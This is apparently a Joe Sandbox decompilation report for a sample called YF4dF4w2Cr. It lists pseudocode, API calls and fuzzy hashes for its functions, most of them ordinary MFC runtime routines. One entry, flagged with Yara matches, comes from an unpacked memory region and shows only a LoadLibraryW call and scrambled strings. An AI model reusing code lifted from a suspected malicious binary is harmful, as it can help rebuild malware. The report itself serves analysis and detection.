                  				intOrPtr _t57;
                  				intOrPtr* _t74;
                  				void* _t75;
                  
                  				_push(0xc);
                  				E00431A9B(E0044B74A, __ebx, __edi, __esi);
                  				_t74 = __ecx;
                  				_t61 =  *((intOrPtr*)(_t75 + 8));
                  				_t77 =  *((intOrPtr*)(_t75 + 8));
                  				if( *((intOrPtr*)(_t75 + 8)) == 0) {
                  					E00406436(__ebx, _t61, __edi, __ecx, _t77);
                  				}
                  				_t56 = _t74 + 0x64;
                  				E00419355(_t61, _t56);
                  				 *((intOrPtr*)(_t74 + 0x58)) =  *((intOrPtr*)(_t74 + 0x68)) - GetSystemMetrics(0x25);
                  				 *((intOrPtr*)(_t74 + 0x60)) = GetSystemMetrics(0x25) +  *((intOrPtr*)(_t74 + 0x68));
                  				_t35 = GetSystemMetrics(0x24);
                  				_t57 =  *_t56;
                  				 *((intOrPtr*)(_t74 + 0x54)) =  *_t56 - _t35;
                  				_t36 = GetSystemMetrics(0x24);
                  				 *((intOrPtr*)(_t74 + 0x5c)) = _t36 + _t57;
                  				 *((intOrPtr*)(_t75 - 0x10)) =  *_t74;
                  				 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x10)) + 0x5c))(0x88, E00411D22( *_t56 - _t35, _t77, 0x800, 0, 0, 0), 0, 0x80000000, _t57 + 0xfffffff0,  *((intOrPtr*)(_t74 + 0x68)) - 0x10, 0x20, 0x20, 0, 0, 0);
                  				E00406A7F(_t74,  *((intOrPtr*)(_t75 + 8)));
                  				if( *((intOrPtr*)(_t75 - 0x10)) != 0) {
                  					 *(_t75 - 0x14) = 0;
                  					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
                  					 *(_t75 - 4) = 0;
                  					E00423059(0x452b4c, _t75 - 0x18, 0, CreateEllipticRgn(0, 0, 0x20, 0x20));
                  					SetWindowRgn( *(_t74 + 0x20),  *(_t75 - 0x14), 1);
                  					E0040EE3C(0x452b4c, _t75 - 0x18, SetCapture( *(_t74 + 0x20)));
                  					SetTimer( *(_t74 + 0x20), 0xe000, 0x32, 0);
                  					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                  					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
                  					E0040ADD4(0x452b4c, _t75 - 0x18, 0, _t74,  *(_t75 - 4));
                  				}
                  				return E00431B73( *((intOrPtr*)(_t75 - 0x10)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041A02E
                  • GetSystemMetrics.USER32 ref: 0041A052
                  • GetSystemMetrics.USER32 ref: 0041A05E
                  • GetSystemMetrics.USER32 ref: 0041A068
                  • GetSystemMetrics.USER32 ref: 0041A075
                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020), ref: 0041A0DC
                  • SetWindowRgn.USER32(?,?,00000001), ref: 0041A0F3
                  • SetCapture.USER32(?), ref: 0041A0FC
                  • SetTimer.USER32(?,0000E000,00000032,00000000), ref: 0041A113
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$H_prolog3$CaptureCreateEllipticException@8ThrowTimerWindow
                  • String ID: L+E
                  • API String ID: 3309283864-4127712704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00428ECF(void* __ebx, void* _a4, intOrPtr _a8) {
                  				void* _v8;
                  				void* _v12;
                  				int _v16;
                  				char* _v20;
                  				int _v24;
                  				signed int _t35;
                  				int* _t44;
                  
                  				_t44 = 0;
                  				_v12 = 0;
                  				_v20 = E004014F0(_a8, 0x104);
                  				_v16 = 0x104;
                  				_v24 = 0;
                  				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) { /* 0x80000000 = HKEY_CLASSES_ROOT */
                  					_v8 = 0;
                  					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                  						_a4 = 0;
                  						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                  							_t35 = RegQueryValueExA(_a4, 0x44f0f5, 0,  &_v24, _v20,  &_v16);
                  							asm("sbb esi, esi");
                  							_t44 =  ~_t35 + 1;
                  							RegCloseKey(_a4);
                  						}
                  						RegCloseKey(_v8);
                  					}
                  					RegCloseKey(_v12);
                  				}
                  				E0040A356(_a8, 0xffffffff);
                  				return _t44;
                  			}

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                  • RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                  • RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                  • RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                  • RegCloseKey.ADVAPI32(?), ref: 00428F62
                  • RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                  • RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$QueryValue
                  • String ID: CLSID$InProcServer32$BE
                  • API String ID: 3523390698-3134485842
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00414A58(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t5;
                  				_Unknown_base(*)()* _t10;
                  				struct HINSTANCE__* _t18;
                  				void* _t19;
                  				char _t21;
                  				intOrPtr _t23;
                  				_Unknown_base(*)()* _t24;
                  				_Unknown_base(*)()* _t25;
                  
                  				_push(__ecx);
                  				_t5 = __ecx;
                  				_t16 = _a4;
                  				 *((intOrPtr*)(__ecx)) = _a4;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				_v8 = __ecx;
                  				_t21 =  *0x4664dc; // 0x0
                  				if(_t21 == 0) {
                  					_push(_t19);
                  					_t18 = GetModuleHandleA("KERNEL32");
                  					_t22 = _t18;
                  					if(_t18 == 0) {
                  						L2:
                  						E00406436(0, _t16, _t18, _t19, _t22);
                  					}
                  					 *0x4664cc = GetProcAddress(_t18, "CreateActCtxA");
                  					 *0x4664d0 = GetProcAddress(_t18, "ReleaseActCtx");
                  					 *0x4664d4 = GetProcAddress(_t18, "ActivateActCtx");
                  					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
                  					_pop(_t18);
                  					 *0x4664d8 = _t10;
                  					_pop(_t19);
                  					_t23 =  *0x4664cc; // 0x0
                  					if(_t23 == 0) {
                  						__eflags =  *0x4664d0; // 0x0
                  						if(__eflags != 0) {
                  							goto L2;
                  						} else {
                  							__eflags =  *0x4664d4; // 0x0
                  							if(__eflags != 0) {
                  								goto L2;
                  							} else {
                  								__eflags = _t10;
                  								if(__eflags != 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					} else {
                  						_t24 =  *0x4664d0; // 0x0
                  						if(_t24 == 0) {
                  							goto L2;
                  						} else {
                  							_t25 =  *0x4664d4; // 0x0
                  							if(_t25 == 0) {
                  								goto L2;
                  							} else {
                  								_t22 = _t10;
                  								if(_t10 == 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					}
                  					_t5 = _v8;
                  					 *0x4664dc = 1;
                  				}
                  				return _t5;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 00414A81
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00414A9E
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 00414AAB
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00414AB8
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00414AC5
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-3617302793
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00448C0F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t18;
                  				void* _t23;
                  				void* _t39;
                  				intOrPtr _t43;
                  				void* _t44;
                  
                  				_t39 = __edx;
                  				_t29 = __ebx;
                  				_push(0x14);
                  				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
                  				E00448F7B(_t44 - 0x14, 0);
                  				_t43 =  *0x467440; // 0x0
                  				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                  				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x4674d8));
                  				_t41 = _t18;
                  				if(_t18 == 0) {
                  					if(_t43 == 0) {
                  						_push( *((intOrPtr*)(_t44 + 8)));
                  						_push(_t44 - 0x10);
                  						_t23 = E00448A8D(__ebx, _t41, _t43, __eflags);
                  						__eflags = _t23 - 0xffffffff;
                  						if(_t23 == 0xffffffff) {
                  							E00430C66(_t44 - 0x20, "bad cast");
                  							E00430CF4(_t44 - 0x20, 0x45e790);
                  						}
                  						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                  						 *0x467440 =  *((intOrPtr*)(_t44 - 0x10));
                  						E00447769( *((intOrPtr*)(_t44 - 0x10)));
                  						E0044911C(_t29, _t39, _t41, _t43, _t41);
                  					} else {
                  						_t41 = _t43;
                  					}
                  				}
                  				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  				E00448FA3(_t44 - 0x14);
                  				return E00431B73(_t41);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00448C16
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448C20
                  • int.LIBCPMT ref: 00448C37
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448C40
                  • codecvt.LIBCPMT ref: 00448C5A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448C6E
                  • __CxxThrowException@8.LIBCMT ref: 00448C7C
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448C8C
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448C92
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: bad cast
                  • API String ID: 577375395-3145022300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0041EA0E(void* __esi) {
                  				void* _t1;
                  				struct HINSTANCE__* _t2;
                  				_Unknown_base(*)()* _t6;
                  				void* _t7;
                  				void* _t8;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t10 = __esi;
                  				if( *0x466500 == 0) {
                  					_t2 = GetModuleHandleA("KERNEL32");
                  					 *0x466500 = _t2;
                  					_t14 = _t2;
                  					if(_t2 == 0) {
                  						_t2 = E00406436(_t7, _t8, _t9, __esi, _t14);
                  					}
                  					_push(_t10);
                  					 *0x4664ec = GetProcAddress(_t2, "CreateActCtxW");
                  					 *0x4664f0 = GetProcAddress( *0x466500, "ReleaseActCtx");
                  					 *0x4664f4 = GetProcAddress( *0x466500, "ActivateActCtx");
                  					_t6 = GetProcAddress( *0x466500, "DeactivateActCtx");
                  					 *0x4664f8 = _t6;
                  					return _t6;
                  				}
                  				return _t1;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 417325364-2424895508
                  • Opcode ID: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction ID: 797181131107fc9c9d18895cd176618ea7f7a223a3ca38473e3e5917ec363889
                  • Opcode Fuzzy Hash: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction Fuzzy Hash: E6F0F878D40311BADB11AF72BC0AA463EA4FB48756712443BEC1192276FBF994448E8E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0040607D(int __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HMENU__* _t91;
                  				int _t92;
                  				struct HMENU__* _t100;
                  				int _t105;
                  				CHAR* _t111;
                  				signed int* _t116;
                  				signed int _t127;
                  				int* _t130;
                  				int* _t132;
                  				int _t134;
                  				void* _t135;
                  
                  				_t121 = __ebx;
                  				_push(0x130);
                  				E00431B04(E0044AC2D, __ebx, __edi, __esi);
                  				_t132 =  *(_t135 + 0x10);
                  				 *(_t135 - 0x130) =  *(_t135 + 8);
                  				_t91 =  *(_t135 + 0xc);
                  				_t134 = 0;
                  				 *(_t135 - 0x128) = _t91;
                  				 *((intOrPtr*)(_t135 - 0x138)) = 0;
                  				 *(_t135 - 0x134) = 0;
                  				_t92 = GetMenuItemCount(_t91);
                  				 *(_t135 - 0x13c) = _t92;
                  				 *(_t135 - 0x118) = 0;
                  				 *(_t135 - 0x114) = 0;
                  				if( *(_t135 + 0x14) == 1) {
                  					 *(_t135 - 0x114) =  *_t132;
                  				}
                  				 *(_t135 - 0x11c) = _t134;
                  				if(_t92 <= _t134) {
                  					L25:
                  					_t132[ *(_t135 + 0x14)] =  *(_t135 - 0x118);
                  					L26:
                  					return E00431B87(_t121, _t132, _t134);
                  				}
                  				_t134 = 0x400;
                  				do {
                  					 *(_t135 - 0x120) = GetSubMenu( *(_t135 - 0x128),  *(_t135 - 0x11c));
                  					_t121 = GetMenuState( *(_t135 - 0x128),  *(_t135 - 0x11c), _t134);
                  					if( *(_t135 - 0x120) != 0 || (_t121 & 0x00000800) == 0) {
                  						 *(_t135 - 0x12c) = 0;
                  						__eflags =  *(_t135 + 0x18);
                  						if( *(_t135 + 0x18) != 0) {
                  							__eflags =  *(_t135 + 0x14) - 5;
                  							if( *(_t135 + 0x14) == 5) {
                  								__eflags = _t132[5] - 1;
                  								if(_t132[5] == 1) {
                  									 *(_t135 - 0x12c) = GetSubMenu( *(_t135 - 0x130),  *(_t135 - 0x114));
                  								}
                  							}
                  						}
                  						_t100 = GetMenuStringA( *(_t135 - 0x128),  *(_t135 - 0x11c), _t135 - 0x110, 0x100, _t134);
                  						__eflags =  *(_t135 - 0x120);
                  						if( *(_t135 - 0x120) == 0) {
                  							__eflags = _t100;
                  							if(_t100 <= 0) {
                  								goto L23;
                  							}
                  							_push(_t135 - 0x110);
                  							_push(GetMenuItemID( *(_t135 - 0x128),  *(_t135 - 0x11c)));
                  							_t121 = _t121 | _t134;
                  							__eflags = _t121;
                  							_push(_t121);
                  							goto L22;
                  						} else {
                  							__eflags =  *(_t135 - 0x12c);
                  							if(__eflags == 0) {
                  								_t105 = GetMenuItemCount( *(_t135 - 0x120));
                  								__eflags = _t105;
                  								if(_t105 == 0) {
                  									goto L23;
                  								}
                  								_push(_t135 - 0x110);
                  								_push( *(_t135 - 0x120));
                  								_push(_t121 & 0x000000ff | 0x00000410);
                  								L22:
                  								InsertMenuA( *(_t135 - 0x130),  *(_t135 - 0x114), ??, ??, ??);
                  								 *(_t135 - 0x114) =  *(_t135 - 0x114) + 1;
                  								_t76 = _t135 - 0x118;
                  								 *_t76 =  *(_t135 - 0x118) + 1;
                  								__eflags =  *_t76;
                  								goto L23;
                  							}
                  							_push( *((intOrPtr*)(E0041F363(_t121, _t132, _t134, __eflags) + 0x10)));
                  							E00406039(_t121, _t135 - 0x124, _t130, _t132, _t134, __eflags);
                  							_t111 =  *(_t135 - 0x124);
                  							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
                  							__eflags =  *(_t111 - 0xc);
                  							if( *(_t111 - 0xc) != 0) {
                  								E00405D76(_t135 - 0x124, 0x20);
                  							}
                  							E00405EC1(_t135 - 0x124, _t135 - 0x110);
                  							_t121 =  *(_t135 - 0x120);
                  							AppendMenuA( *(_t135 - 0x12c), 0x10, _t121,  *(_t135 - 0x124));
                  							 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
                  							_t116 =  &(_t132[ *(_t135 + 0x14)]);
                  							 *_t116 =  *_t116 & 0x00000000;
                  							 *((intOrPtr*)(_t116 - 4)) =  *((intOrPtr*)(_t116 - 4)) + 1;
                  							 *((intOrPtr*)(_t135 - 0x138)) = 1;
                  							 *(_t135 - 0x134) = _t121;
                  							E004010B0( &(( *(_t135 - 0x124))[0xfffffffffffffff0]), _t130);
                  							goto L23;
                  						}
                  					} else {
                  						_t127 =  *(_t135 + 0x14);
                  						_t121 =  *(_t135 - 0x118);
                  						_t130 =  &(_t132[_t127]);
                  						 *_t130 =  *(_t135 - 0x118);
                  						 *(_t135 - 0x118) = 0;
                  						if(_t127 < 5) {
                  							 *(_t135 - 0x114) =  *(_t135 - 0x114) + _t130[1];
                  						}
                  						 *(_t135 + 0x14) =  *(_t135 + 0x14) + 2;
                  					}
                  					L23:
                  					 *(_t135 - 0x11c) =  *(_t135 - 0x11c) + 1;
                  				} while ( *(_t135 - 0x11c) <  *(_t135 - 0x13c));
                  				if( *((intOrPtr*)(_t135 - 0x138)) != 0) {
                  					goto L26;
                  				}
                  				goto L25;
                  			}















                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
                  • String ID:
                  • API String ID: 2171526683-0
                  • Opcode ID: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction ID: 28db6550187b75f0f8ddc5cf35a0011be1a11c4ba9a9efde7d1322a6cca787e0
                  • Opcode Fuzzy Hash: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction Fuzzy Hash: ED6103708002289FCB25DF14CD85BD9BBB5FF09314F0141EAE64AA62A1D7745EA1CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA2D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C1g9$Hw$P<Ex$Y[]C$[D`=$tN o$wRR|
                  • API String ID: 1029625771-1834093024
                  • Opcode ID: 45897a37092bf01ef51b0468512db1d24bb9984b40920681da94a22858650713
                  • Instruction ID: dfe5466a0de69488b5fe992ea43bcac66dce4b292fa49aa1a66b1032e7aa7932
                  • Opcode Fuzzy Hash: 45897a37092bf01ef51b0468512db1d24bb9984b40920681da94a22858650713
                  • Instruction Fuzzy Hash: B7D1B7B48063ACCBDB60CF829A857DDBB70FB15740F2086C9D5593B214DB750A86CF96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E0042B11B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t87;
                  				signed int _t89;
                  				void* _t99;
                  				intOrPtr _t101;
                  				void* _t104;
                  				intOrPtr* _t105;
                  				void* _t106;
                  				intOrPtr* _t107;
                  				char* _t114;
                  				intOrPtr _t115;
                  				signed int _t119;
                  				void* _t126;
                  				char* _t127;
                  				signed char _t128;
                  				intOrPtr _t146;
                  				void* _t147;
                  				void* _t148;
                  				signed int _t157;
                  
                  				_t143 = __edi;
                  				_t136 = __edx;
                  				_push(0xac);
                  				E00431B04(E0044C739, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t147 - 0xb0)) =  *((intOrPtr*)(_t147 + 0x10));
                  				 *((intOrPtr*)(_t147 - 0xac)) =  *((intOrPtr*)(_t147 + 0x18));
                  				_t146 = __ecx;
                  				 *((intOrPtr*)(_t147 - 0xb8)) = __ecx;
                  				E0042A1E2(__ecx,  *((intOrPtr*)(_t147 + 0x1c)));
                  				 *((intOrPtr*)(_t147 - 4)) = 0;
                  				 *((intOrPtr*)(__ecx)) = 0x4547f4;
                  				E004014C0(__ecx + 0x8c, __edx);
                  				 *((intOrPtr*)(_t146 + 0x1d8)) = 0;
                  				 *((char*)(_t147 - 4)) = 1;
                  				 *((intOrPtr*)(_t146 + 0x1dc)) = 0;
                  				if( *((intOrPtr*)(_t147 + 0x20)) == 0) {
                  					_t143 = 0x94;
                  					E00431160(0x94, _t147 - 0xa4, 0, 0x94);
                  					_t148 = _t148 + 0xc;
                  					 *(_t147 - 0xa4) = 0x94;
                  					_t119 = GetVersionExA(_t147 - 0xa4);
                  					 *((intOrPtr*)(_t147 + 0x20)) = 0x58;
                  					asm("sbb eax, eax");
                  					 *(_t146 + 0x78) =  !_t119 &  *(_t147 + 0x24);
                  				}
                  				_t87 = E0043108C(0, _t136, _t143,  *((intOrPtr*)(_t147 + 0x20)));
                  				_pop(_t126);
                  				 *((intOrPtr*)(_t146 + 0x74)) = _t87;
                  				_t155 = _t87;
                  				if(_t87 == 0) {
                  					_t87 = E004063FE(0, _t126, _t143, _t146, _t155);
                  				}
                  				E00431160(_t143, _t87, 0,  *((intOrPtr*)(_t147 + 0x20)));
                  				_t89 =  *(_t147 + 8);
                  				 *(_t146 + 0x88) = _t89;
                  				asm("sbb eax, eax");
                  				 *((intOrPtr*)(_t146 + 0x54)) =  ~_t89 + 0x7005;
                  				 *((intOrPtr*)(_t146 + 0x1d4)) = 0;
                  				_t127 = _t146 + 0x90;
                  				 *_t127 = 0;
                  				_t144 = _t146 + 0xd0;
                  				 *_t144 = 0;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)))) =  *((intOrPtr*)(_t147 + 0x20));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x1c)) = _t144;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x20)) = 0x104;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t147 + 0xc));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x24)) = _t127;
                  				_t128 = 0x40;
                  				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x28) = _t128;
                  				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) |  *(_t147 + 0x14) | 0x00080020;
                  				if(( *(_t147 + 0x14) & _t128) != 0) {
                  					_t115 =  *((intOrPtr*)(_t146 + 0x74));
                  					_t50 = _t115 + 0x34;
                  					 *_t50 =  *(_t115 + 0x34) & 0xff7fffff;
                  					_t157 =  *_t50;
                  				}
                  				_t99 = E0041F363(0, _t144, _t146, _t157);
                  				_t129 =  *((intOrPtr*)(_t146 + 0x74));
                  				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 8)) =  *((intOrPtr*)(_t99 + 0xc));
                  				_t101 =  *((intOrPtr*)(_t146 + 0x74));
                  				 *((intOrPtr*)(_t101 + 0x44)) = E0042A570;
                  				if( *((intOrPtr*)(_t147 - 0xb0)) != 0) {
                  					_t101 = E004048ED(0, _t129, _t144, _t146, _t144, 0x104,  *((intOrPtr*)(_t147 - 0xb0)), 0xffffffff);
                  				}
                  				if( *((intOrPtr*)(_t147 - 0xac)) != 0) {
                  					_t144 = _t146 + 0x8c;
                  					E00402CA0(_t146 + 0x8c, _t146,  *((intOrPtr*)(_t147 - 0xac)));
                  					_t113 = E004014F0(_t146 + 0x8c, 0);
                  					while(1) {
                  						_t114 = E004334ED(_t113, 0x7c);
                  						if(_t114 == 0) {
                  							break;
                  						}
                  						 *_t114 = 0;
                  						_t113 = _t114 + 1;
                  						__eflags = _t114 + 1;
                  					}
                  					_t101 =  *((intOrPtr*)(_t146 + 0x74));
                  					 *((intOrPtr*)(_t101 + 0xc)) =  *((intOrPtr*)(_t146 + 0x8c));
                  				}
                  				if( *(_t146 + 0x78) == 1) {
                  					__imp__CoInitializeEx(0, 2);
                  					if(_t101 < 0) {
                  						L23:
                  						 *(_t146 + 0x78) = 0;
                  					} else {
                  						_t104 = _t147 - 0xa8;
                  						_push(_t104);
                  						_push(0x454974);
                  						_t144 = _t146 + 0x1d8;
                  						_push(1);
                  						 *_t144 = 0x4547a0;
                  						 *((intOrPtr*)(_t146 + 0x1dc)) = 0x4547d0;
                  						_push(0);
                  						if( *(_t146 + 0x88) == 0) {
                  							_push(0x463168);
                  						} else {
                  							_push(0x463158);
                  						}
                  						__imp__CoCreateInstance();
                  						if(_t104 < 0) {
                  							goto L23;
                  						} else {
                  							_t105 =  *((intOrPtr*)(_t147 - 0xa8));
                  							_t130 =  *_t105;
                  							_t106 =  *((intOrPtr*)( *_t105))(_t105, 0x454764, _t147 - 0xb4);
                  							_t165 = _t106;
                  							if(_t106 < 0) {
                  								L20:
                  								E00406436(0, _t130, _t144, _t146, _t165);
                  							}
                  							_t107 =  *((intOrPtr*)(_t147 - 0xa8));
                  							_t130 =  *_t107;
                  							_push(_t146 + 0x7c);
                  							_push(_t144);
                  							_push(_t107);
                  							if( *((intOrPtr*)( *_t107 + 0x1c))() < 0) {
                  								goto L20;
                  							}
                  							 *((intOrPtr*)(_t146 + 0x80)) =  *((intOrPtr*)(_t147 - 0xa8));
                  							 *((intOrPtr*)(_t146 + 0x84)) =  *((intOrPtr*)(_t147 - 0xb4));
                  						}
                  					}
                  				}
                  				return E00431B87(0, _t144, _t146);
                  			}






















                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042B125
                  • _memset.LIBCMT ref: 0042B186
